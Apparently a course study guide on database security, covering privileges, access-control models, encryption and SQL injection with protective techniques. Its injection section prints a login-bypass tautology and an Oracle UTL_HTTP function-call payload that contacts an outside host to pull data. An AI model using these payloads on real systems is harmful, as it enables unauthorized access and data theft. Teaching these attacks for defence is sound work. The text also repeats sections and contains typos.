UNIT- 5

Database Security

1. Define Database privilege?

It is a right to execute a particular type of SQL statement or to access another users object
Eg. Right to connect to database.
Right to create a table
Right to select rows from another users table
Right to execute another users stored procedure.

2. What is threat?
A threat is any situation, event or personnel that will adversely affect the database security and
smooth and efficient functioning of organization.
A threat may be caused by a situation or event involving a person, action or circumstance that is
likely to bring harm to organization

3. Define Database security.

Database security concerns the use of a broad range of information security controls to protect
databases (potentially including the data, the database applications or stored functions, the database
systems, the database servers and the associated network links) against compromises of their
confidentiality, integrity and availability.

4. Mention the users of database.

Database administrators
Security officers
Network administrators
Application developers
Application administrators
DB users

5. What does database security refer to?

Database security refers to the protection from unauthorized access and malicious destruction or
alteration.
6. List some security violations (or) name any forms of malicious access.
Unauthorized Reading of data
Unauthorized modification of data
Unauthorized destruction of data.
7. List the types of authorization.
Read authorization
Write authorization
Update authorization
Drop authorization
8. What is authorization graph?
Passing of authorization from one user to another can be represented by an authorization graph.

9. List out various user authorization to modify the database Schema.

Index Authorization
Resource authorization
Alteration authorization
Drop authorization

10. What are audit trails?

An audit trail is a log of all changes to the database along with information such as which user
performed the change and when the change was performed.

11. What is Benefits of Database Encryption?

Ensure guaranteed access to encrypted data by authorized users by automating storage and back-up
for mission critical master encryption keys.Simplify data privacy compliance obligations and
reporting activities through the use of a security-certified encryption and key management to
enforce critical best practices and other standards of due care.

12. Name the various privileges in SQL?

Delete
Select
Insert
Update

13. Mention the various user privileges.

All privileges directly granted to the user or role.
All privileges granted to roles that have been granted to the user or role.

14. Give the limitations of SQL authorization.

The code for checking authorization becomes intermixed with the rest of the application code.
Implementing authorization through application code rather than specifying it declaratively in SQL
makes it hard to ensure the absence of loopholes.

15. What does authentication refer? List some authentication techniques.

Authentication refers to the task of verifying the identity of a person.
Authentication techniques:
Challenge response scheme
Digital Signatures
Non repudiation
1. Explain about Threats and risks in database security.
(OR)
Present an Overview of Database Security.
Database security concerns the use of a broad range of information security controls to protect
databases (potentially including the data, the database applications or stored functions, the database
systems, the database servers and the associated network links) against compromises of their
confidentiality, integrity and availability. It involves various types or categories of controls, such
as technical, procedural/administrative and physical. Database security is a specialist topic within
the broader realms of computer security, information security and risk management.
Types of Security
Database security is a broad area that addresses many issues, including the following:
■ Various legal and ethical issues regarding the right to access certain information
■ Policy issues at the governmental, institutional, or corporate level as to what kinds of information
should not be made publicly available—for example, credit ratings and personal medical records.
■ System-related issues such as the system levels at which various security functions should be
enforced—for example, whether a security function should be handled at the physical hardware
level, the operating system level, or the DBMS level.
■ The need in some organizations to identify multiple security levels and to categorize the data and
users based on these classifications—for example, top secret, secret, confidential, and unclassified.
Threats to databases
Loss of integrity
Loss of availability
Loss of confidentiality
To protect databases against these types of threats four kinds of countermeasures can be
implemented:
Access control: user accounts, passwords
Inference control: when statistical databases are used
Flow control: to avoid sensitive data reaching unauthorized users
Encryption
Threats
Excessive and Unused Privileges
Privilege Abuse
SQL Injection
Malware
Weak Audit Trail
Storage Media Exposure

Exploitation of Vulnerabilities
Misconfigured Databases
Unmanaged Sensitive Data
Denial of Service
Security risk to Database System:
Security risks to database systems include, for example:
Unauthorized or unintended activity or misuse by authorized database users, database
administrators, or network/systems managers, or by unauthorized users or hackers
(e.g. inappropriate access to sensitive data, metadata or functions within databases, or inappropriate
changes to the database programs, structures or security configurations);
Malware infections causing incidents such as unauthorized access, leakage or disclosure of
personal or proprietary data, deletion of or damage to the data or programs, interruption or denial of
authorized access to the database, attacks on other systems and the unanticipated failure of database
services;
Overloads, performance constraints and capacity issues resulting in the inability of authorized
users to use databases as intended;
Physical damage to database servers caused by computer room fires or floods, overheating,
lightning, accidental liquid spills, static discharge, electronic breakdowns/equipment failures and
obsolescence;
Design flaws and programming bugs in databases and the associated programs and systems,
creating various security vulnerabilities (e.g. unauthorized privilege escalation), data
loss/corruption, performance degradation etc.;
Data corruption and/or loss caused by the entry of invalid data or commands, mistakes in
database or system administration processes, sabotage/criminal damage.

2. Explain about Types of Privileges in database language.

A privilege is a right to execute a particular type of SQL statement or to access another user's object.
Some examples of privileges include the right to:
Connect to the database
Create a table
Select rows from another user's table
Execute another user's stored procedure
You grant privileges to users so these users can accomplish tasks required for their jobs.
You should grant a privilege only to a user who requires that privilege to accomplish the in
necessary work. Excessive granting of unnecessary privileges can compromise security.
A user can receive a privilege in two different ways:
You can grant privileges to users explicitly. For example, you can explicitly grant to user SCOTT
the privilege to insert records into the employees table.
You can also grant privileges to a role (a named group of privileges), and then grant the role to one
or more users. For example, you can grant the privileges to select, insert, update, and delete records
from the employees table to the role named clerk, which in turn you can grant to users scott and
brian.
Types:
System Privileges
Schema Object Privileges
Table Privileges
View Privileges
Procedure Privileges
Type Privileges
In some cases it is desirable to grant a privilege to a user temporarily. For example,
The owner of a relation may want to grant the SELECT privilege to a user for a specific task and
then revoke that privilege once the task is completed.
Hence, a mechanism for revoking privileges is needed. In SQL, a REVOKE command is
included for the purpose of canceling privileges.
Suppose that the DBA creates four accounts
A1, A2, A3, A4 and wants only A1 to be able to create base relations. Then the DBA must issue
the following GRANT command in SQL
GRANT CREATETAB TO A1;
In SQL the same effect can be accomplished by having the DBA issue a CREATE
SCHEMA command as follows:
CREATE SCHAMA EXAMPLE AUTHORIZATION A1;
User account A1 can create tables under the schema called EXAMPLE.
Suppose that A1 creates the two base relations EMPLOYEE and
DEPARTMENT
A1 is then owner of these two relations and hence all the relation privileges on each of them.
Suppose that A1 wants to grant A2 the privilege to insert and delete tuples in both of these
relations, but A1 does not want A2 to be able to propagate these privileges to additional accounts:
GRANT INSERT, DELETE ON EMPLOYEE, DEPARTMENT TO A2;
Suppose that A1 decides to revoke the SELECT privilege on the EMPLOYEE relation from
A3; A1 can issue:
REVOKE SELECT ON EMPLOYEE FROM A3;

3. Explain types of database security and database security issues.

Database security issues
Types of Security
Legal and ethical issues
Policy issues
System-related issues
The need to identify multiple security levels
Threats to databases
Loss of integrity
Loss of availability
Loss of confidentiality
To protect databases against these types of threats four kinds of countermeasures can be
implemented:
Access control
Inference control
The security mechanism of a DBMS must include provisions for restricting access to the
database as a whole
This function is called access control and is handled by creating user accounts and passwords to
control login process by the DBMS.
The security problem associated with databases is that of controlling the access to a statistical
database, which is used to provide statistical information or summaries of values based on various
criteria.
The countermeasures to statistical database security problem is called inference control
measures.
Flow control
Another security is that of flow control, which prevents information from flowing in such a
way that it reaches unauthorized users.
Encryption
A final security issue is data encryption, which is used to protect sensitive data (such as credit
card numbers) that is being transmitted via some type communication network.
The data is encoded using some encoding algorithm.
Types of database security
A DBMS typically includes a database security and authorization subsystem that is responsible
for ensuring the security portions of a database against unauthorized access.
Types of database security mechanisms:
Discretionary Access Control
Mandatory Access Control
Role based Access Control.
Discretionary Access Control
The typical method of enforcing discretionary access control in a database system is based on the
granting and revoking privileges
Types of Discretionary Privileges
The account level:
□At this level, the DBA specifies the particular privileges that each account holds independently of
the relations in the database.
□The privileges at the account level apply to the capabilities provided to the account itself and can
include
□The CREATE SCHEMA or CREATE TABLE privilege, to create a schema or base relation;
□The CREATE VIEW privilege;
□The ALTER privilege, to apply schema changes such adding or removing attributes from
relations;
□The DROP privilege, to delete relations or views;
□The MODIFY privilege, to insert, delete, or update tuples;
□The SELECT privilege, to retrieve information from the database by using a SELECT query.
□The relation level (or table level):
□At this level, the DBA can control the privilege to access each individual relation or view in the
database.
□This includes base relations and virtual (view) relations.
□To control the granting and revoking of relation privileges, each relation R in a database is
assigned and owner account, which is typically the account that was used when the relation was
created in the first place.
□The owner of a relation is given all privileges on that relation.
□Suppose that the DBA creates four accounts
□A1, A2, A3, A4
□And wants only A1 to be able to create base relations. Then the DBA must issue the following
GRANT command in SQL
GRANT CREATETAB TO A1;
□In SQL2 the same effect can be accomplished by having the DBA issue a CREATE
SCHEMA command as follows:
CREATE SCHAMA EXAMPLE AUTHORIZATION A1;
□Suppose that A1 wants to allow A3 to retrieve information from either of the two tables and also
to be able to propagate the SELECT privilege to other accounts.
□A1 can issue the command:
GRANT SELECT ON EMPLOYEE, DEPARTMENT
TO A3 WITH GRANT OPTION;
Mandatory Access Control and Role-Based Access Control for Multilevel Security
□The discretionary access control techniques of granting and revoking privileges on relations have
traditionally been the main security mechanism for relational database systems.
□This is an all-or-nothing method:
□A user either has or does not have a certain privilege.
□In many applications, and additional security policy is needed that classifies data and users based
on security classes.
□This approach as mandatory access control would typically be combined with the discretionary
access control mechanisms.
□Typical security classes are top secret (TS), secret (S), confidential (C), and unclassified
(U), where TS is the highest level and U the lowest: TS ≥ S ≥ C ≥ U
□The commonly used model for multilevel security, known as the Bell-LaPadula model, classifies
each subject (user, account, program) and object (relation, tuple, column, view, operation) into one
of the security classifications, T, S, C, or U:
□Clearance (classification) of a subject S as class(S) and to the classification of an object
O as class (O).
□Two restrictions are enforced on data access based on the subject/object classifications:
□Simple security property: A subject S is not allowed read access to an object O unless class(S) ≥
class (O).
□A subject S is not allowed to write an object O unless class(S) ≤ class(O). This known as the star
property (or * property).
Role-based access control
□Its basic notion is that permissions are associated with roles, and users are assigned to appropriate
roles.
□Roles can be created using the CREATE ROLE and DESTROY ROLE commands.
□The GRANT and REVOKE commands discussed under DAC can then be used to assign and
revoke privileges from roles.

4. Discuss about the Access control mechanism and Cryptography methods to secure the
Database.
Access control mechanism
It’s all about user’s access to the database.
Types
Discretionary Access Control
Mandatory Access Control
Role based Access Control.
Discretionary Access Control
The typical method of enforcing discretionary access control in a database system is based on the
granting and revoking privileges
Types of Discretionary Privileges
The account level:
□At this level, the DBA specifies the particular privileges that each account holds independently of
the relations in the database.
□The privileges at the account level apply to the capabilities provided to the account itself and can
include
□The CREATE SCHEMA or CREATE TABLE privilege, to create a schema or base relation;
□The CREATE VIEW privilege;
□The ALTER privilege, to apply schema changes such adding or removing attributes from
relations;
□The DROP privilege, to delete relations or views;
□The MODIFY privilege, to insert, delete, or update tuples;
□The SELECT privilege, to retrieve information from the database by using a SELECT query.
The relation level (or table level):
□At this level, the DBA can control the privilege to access each individual relation or view in the
database.
□This includes base relations and virtual (view) relations.
□To control the granting and revoking of relation privileges, each relation R in a database is
assigned and owner account, which is typically the account that was used when the relation was
created in the first place.
□The owner of a relation is given all privileges on that relation.
□Suppose that the DBA creates four accounts A1, A2, A3, A4 and wants only A1 to be able to
create base relations. Then the DBA must issue the following
GRANT command in SQL
GRANT CREATETAB TO A1;
□In SQL2 the same effect can be accomplished by having the DBA issue a CREATE
SCHEMA command as follows:
CREATE SCHAMA EXAMPLE AUTHORIZATION A1;
□Suppose that A1 wants to allow A3 to retrieve information from either of the two tables and also
to be able to propagate the SELECT privilege to other accounts.
□A1 can issue the command:
GRANT SELECT ON EMPLOYEE, DEPARTMENT
TO A3 WITH GRANT OPTION;
Mandatory Access Control and Role-Based Access Control for Multilevel Security
□The discretionary access control techniques of granting and revoking privileges on relations have
traditionally been the main security mechanism for relational database systems.
□This is an all-or-nothing method:
□A user either has or does not have a certain privilege.
□In many applications, and additional security policy is needed that classifies data and users based
on security classes.
□This approach as mandatory access control would typically be combined with the discretionary
access control mechanisms.
□Typical security classes are top secret (TS), secret (S), confidential (C), and unclassified
(U), where TS is the highest level and U the lowest: TS ≥ S ≥ C ≥ U
□The commonly used model for multilevel security, known as the Bell-LaPadula model, classifies
each subject (user, account, and program) and object (relation, tuple, column, view, operation) into
one of the security classifications, T, S, C, or U:
□Clearance (classification) of a subject S as class(S) and to the classification of an object
O as class (O).
□Two restrictions are enforced on data access based on the subject/object classifications:
□Simple security property: A subject S is not allowed read access to an object O unless class(S) ≥
class (O).
□A subject S is not allowed to write an object O unless class(S) ≤ class(O). This known as the star
property (or * property).
Role-based access control
□Its basic notion is that permissions are associated with roles, and users are assigned to appropriate
roles.
□Roles can be created using the CREATE ROLE and DESTROY ROLE commands.
□The GRANT and REVOKE commands discussed under DAC can then be used to assign and
revoke privileges from roles.
Cryptography method to secure the database
□Encryption is a means of maintaining secure data in an insecure environment.
□Encryption consists of applying an encryption algorithm to data using some pre specified
encryption key.
□The resulting data has to be decrypted using a decryption key to recover the original data.
Data and Advanced Encryption Standards (DES)
□DES can provide end-to-end encryption on the channel between the sender A and receiver
B.
□DES algorithm is a careful and complex combination of two of the fundamental building
Blocks of encryption:
□Substitution and permutation (transposition).
□The DES algorithm derives its strength from repeated application of these two techniques for a
total of 16 cycles.
□Plaintext (the original form of the message) is encrypted as blocks of 64 bits.
Public Key Encryption
□Public key algorithms are based on mathematical functions rather than operations on bit patterns.
□They also involve the use of two separate keys
□In contrast to conventional encryption, which uses only one key.
□The use of two keys can have profound consequences in the areas of confidentiality, key
distribution, and authentication.
□The two keys used for public key encryption are referred to as the public key and the private key.
The essential steps are as follows:
□Each user generates a pair of keys to be used for the encryption and decryption of messages.
□Each user places one of the two keys in a public register or other accessible file. This is the public
key. The companion key is kept private (private key).
□If a sender wishes to send a private message to a receiver, the sender encrypts the message using
the receiver’s public key.
□When the receiver receives the message, he or she decrypts it using the receiver’s private key.
□No other recipient can decrypt the message because only the receiver knows his or her private key.
Digital Signatures:
□A digital signature is an example of using encryption techniques to provide authentication services
in e-commerce applications.
□A digital signature is a means of associating a mark unique to an individual with a body of text.
□The mark should be unforgettable, meaning that others should be able to check that the signature
does come from the originator.
□A digital signature consists of a string of symbols.
□Signature must be different for each use.
□This can be achieved by making each digital signature a function of the message that it is signing,
together with a time stamp.
□Public key techniques are the means creating digital signatures

SQL Injection
SQL injection is one of the most common threats to a database system. We will discuss it in detail
later in this section. Some of the other frequent attacks on databases are:
 Unauthorized privilege escalation. This attack is characterized by an indi- vidual
attempting to elevate his or her privilege by attacking vulnerable points in the
database systems.
 Privilege abuse. Whereas unauthorized privilege escalation is done by an
unauthorized user, this attack is performed by a privileged user. For exam- ple, an
administrator who is allowed to change student information can use this privilege
to update student grades without the instructor’s permission.
  Denial of service. A denial of service (DOS) attack is an attempt to makeresources
unavailable to its intended users. It is a general attack category inwhich access to
network applications or data is denied to intended users by overflowing the buffer
or consuming resources.
 Weak authentication. If the user authentication scheme is weak, an attacker can
impersonate the identity of a legitimate user by obtaining her login credentials.

SQL Injection Methods

Web programs and applications that access a data- base can send commands and data to the
database, as well as display data retrieved from the database through the Web browser. In an SQL
injection attack, the attacker injects a string input through the application, which changes or
manipulates the SQL statement to the attacker’s advantage. An SQL injection attack can harm
the database in various ways, such as unauthorized manipulation of the data- base or retrieval of
sensitive data. It can also be used to execute system-level commands that may cause the system
to deny service to the application. This section describes types of injection attacks.
SQL Manipulation. A manipulation attack, which is the most common type of injection attack,
changes an SQL command in the application—for example, by adding conditions to the WHERE-
clause of a query, or by expanding a query with additional query components using set operations
such as UNION, INTERSECT, or MINUS. Other types of manipulation attacks are also possible.
A typical manipulation attack occurs during database login. For example, suppose that a
simplistic authentication procedure issues the following query and checks to see if any rows were
returned:
SELECT * FROM users WHERE username = ‘jake’ and PASSWORD =
‘jakespasswd’ ;
The attacker can try to change (or manipulate) the SQL statement by changing it as
follows:
SELECT * FROM users WHERE username = ‘jake’ and (PASSWORD =
‘jakespasswd’ or ‘x’ = ‘x’) ;

As a result, the attacker who knows that ‘jake’ is a valid login of some user is able tolog into the
database system as ‘jake’ without knowing his password and is able todo everything that ‘jake’
may be authorized to do to the database system.

Code Injection. This type of attack attempts to add additional SQL statements or commands to
the existing SQL statement by exploiting a computer bug, which is caused by processing invalid
data. The attacker can inject or introduce code into a computer program to change the course of
execution. Code injection is a popular technique for system hacking or cracking to gain
information.
Function Call Injection. In this kind of attack, a database function or operating system function
call is inserted into a vulnerable SQL statement to manipulate the data or make a privileged
system call. For example, it is possible to exploit a func-tion that performs some aspect related to
network communication. In addition, functions that are contained in a customized database
package, or any custom data-base function, can be executed as part of an SQL query. In particular,
dynamicallycreated SQL queries (see Chapter 10) can be exploited since they are constructedat
runtime.
For example, the dual table is used in the FROM clause of SQL in Oracle when a userneeds to run
SQL that does not logically have a table name. To get today’s date, wecan use:
SELECT SYSDATE FROM dual;

The following example demonstrates that even the simplest SQL statements can bevulnerable.
SELECT TRANSLATE (‘user input’, ‘from_string’, ‘to_string’) FROM dual;

Here, TRANSLATE is used to replace a string of characters with another stringof characters.
The TRANSLATE function above will replace the characters of the ‘from_string’ with the characters
in the ‘to_string’ one by one. This means that thef will be replaced with the t, the r with the o, the
o with the _, and so on.
This type of SQL statement can be subjected to a function injection attack. Con- sider the
following example:
SELECT TRANSLATE (“ || UTL_HTTP.REQUEST (‘http://129.107.2.1/’) || ”,
‘98765432’, ‘9876’) FROM dual;

The user can input the string (“ || UTL_HTTP.REQUEST (‘http://129.107.2.1/’) ||”), where || is
the concatenate operator, thus requesting a page from a Web server. UTL_HTTP makes
Hypertext Transfer Protocol (HTTP) callouts from SQL. The REQUEST object takes a URL
(‘http://129.107.2.1/’ in this example) as a parame-ter, contacts that site, and returns the data
(typically HTML) obtained from that site. The attacker could manipulate the string he inputs, as
well as the URL, to include other functions and do other illegal operations. We just used a
dummy example to show conversion of ‘98765432’ to ‘9876’, but the user’s intent would beto
access the URL and get sensitive information. The attacker can then retrieve useful
information from the database server—located at the URL that is passed as a parameter—and
send it to the Web server (that calls the TRANSLATE function).

Risks Associated with SQL Injection

SQL injection is harmful and the risks associated with it provide motivation for attackers. Some
of the risks associated with SQL injection attacks are explained below.
■ Database fingerprinting. The attacker can determine the type of database
being used in the backend so that he can use database-specific attacks that
correspond to weaknesses in a particular DBMS.
■ Denial of service. The attacker can flood the server with requests, thus
denying service to valid users, or the attacker can delete some data.
■ Bypassing authentication. This is one of the most common risks, in which
the attacker can gain access to the database as an authorized user and per-
form all the desired tasks.
 ■ Identifying injectable parameters. In this type of attack, the attacker gathers
important information about the type and structure of the back-end
database of a Web application. This attack is made possible by the fact that
the default error page returned by application servers is often overly
descriptive.
■ Executing remote commands. This provides attackers with a tool to exe-
cute arbitrary commands on the database. For example, a remote user can
execute stored database procedures and functions from a remote SQL
inter-active interface.
■ Performing privilege escalation. This type of attack takes advantage of log- ical
flaws within the database to upgrade the access level.

Protection Techniques against SQL Injection

Protection against SQL injection attacks can be achieved by applying certain programming rules
to all Web-accessible procedures and functions. This section describes some of these techniques.
Bind Variables (Using Parameterized Statements). The use of bind variables (also known as
parameters; see Chapter 10) protects against injection attacks and also improves performance.
Consider the following example using Java and JDBC:
PreparedStatement stmt = conn.prepareStatement( “SELECT * FROM
EMPLOYEE WHERE EMPLOYEE_ID=? AND PASSWORD=?”);

stmt.setString(1, employee_id);
stmt.setString(2, password);
Instead of embedding the user input into the statement, the input should be bound to a parameter.
In this example, the input ‘1’ is assigned (bound) to a bind variable ‘employee_id’ and input ‘2’
to the bind variable ‘password’ instead of directly pass-ing string parameters.
Filtering Input (Input Validation). This technique can be used to remove escapecharacters from
input strings by using the SQL Replace function. For example, thedelimiter single quote (‘) can
be replaced by two single quotes (‘’). Some SQL manipulation attacks can be prevented by using
this technique, since escape charac-ters can be used to inject manipulation attacks. However,
because there can be a large number of escape characters, this technique is not reliable.
Function Security. Database functions, both standard and custom, should be restricted, as they
can be exploited in the SQL function injection attacks.